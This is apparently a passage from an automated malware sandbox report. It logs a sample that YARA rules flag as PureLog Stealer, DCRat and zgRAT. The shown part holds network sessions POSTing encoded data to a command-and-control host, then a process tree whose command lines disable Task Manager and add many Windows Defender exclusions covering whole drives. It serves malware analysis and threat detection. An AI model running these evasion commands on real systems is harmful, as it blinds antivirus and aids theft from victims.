                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                136 | 192.168.2.4 | 50144 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:37.681149006 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:38.036092043 CET | 2504 | OUT | Data Raw: 58 5d 51 54 5a 43 5f 58 54 5d 55 5a 50 58 59 5f 50 55 5a 5d 57 57 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]QTZC_XT]UZPXY_PUZ]WWPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU :6B28[1!"3?5V48+??1U.';"](%#X'/\/4
                                                                                Jan 11, 2025 23:34:38.134295940 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:38.293664932 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oJFity7d91eiSnlsgFC6Si29nB6jDtmlFrmz4c7dc5AZvBs%2FU%2BjnM8BP4SqsOhBwKB5e2OTMQH1tNVkfl4B8GKFOTI67%2BFkE0%2F8XNQB3lo9HglgR3zPYDQBIKjt869X2oncR7no8"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 900860141aa343c4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3378&min_rtt=2177&rtt_var=3218&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=123875&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                137 | 192.168.2.4 | 50145 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:38.434056997 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:38.786257982 CET | 2504 | OUT | Data Raw: 58 5a 54 55 5a 40 5a 5e 54 5d 55 5a 50 5a 59 5d 50 55 5a 5f 57 52 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XZTUZ@Z^T]UZPZY]PUZ_WRPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:U*&<X&"%_$/.7</+4)<(%1.]5?<#X'/\/<
                                                                                Jan 11, 2025 23:34:38.879250050 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:39.036425114 CET | 797 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aJ8j52AKNK3aDTbAXHof3unFr2l2dd5IWLbWwoNpR5fe3hc6KzewIB63HBtRCFcEusfTL6gQ6Cb6JdsqCYXAjkwsxqBfJEZukNB%2F5w2hby1iPQfovRyRHbJANQmo%2FdfwUXfK5jwh"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90086018bb3b8cee-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3604&min_rtt=1985&rtt_var=3984&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=97698&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:34:39.123140097 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0



                                                                                Target ID:0
                                                                                Start time:17:31:56
                                                                                Start date:11/01/2025
                                                                                Path:C:\Users\user\Desktop\OisrvsB6Ea.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\OisrvsB6Ea.exe"
                                                                                Imagebase:0x270000
                                                                                File size:1'899'080 bytes
                                                                                MD5 hash:092F45DAC00EF24F3836DBFE18DFA931
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1668531861.00000000053CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:1
                                                                                Start time:17:31:56
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe"
                                                                                Imagebase:0x230000
                                                                                File size:147'456 bytes
                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:17:32:25
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\XyQqwqHSpVeTNnNDm2Xa4eg.bat" "
                                                                                Imagebase:0x240000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:17:32:25
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:17:32:26
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                Imagebase:0x780000
                                                                                File size:59'392 bytes
                                                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:8
                                                                                Start time:17:32:26
                                                                                Start date:11/01/2025
                                                                                Path:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe"
                                                                                Imagebase:0xbc0000
                                                                                File size:2'072'064 bytes
                                                                                MD5 hash:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1964321425.0000000000012000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 83%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:9
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:10
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:11
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:12
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:13
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:14
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:15
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:16
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:17
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:18
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:19
                                                                                Start time:17:32:28
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:20
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:21
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:22
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:23
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:24
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:25
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:26
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:27
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:28
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:29
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:30
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:31
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:32
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\sihost.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:33
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\PrintHood\SearchApp.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:34
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:35
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft office\Office16\dasHost.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:36
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:37
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:38
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:39
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:40
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:41
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:42
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:43
                                                                                Start time:17:32:29
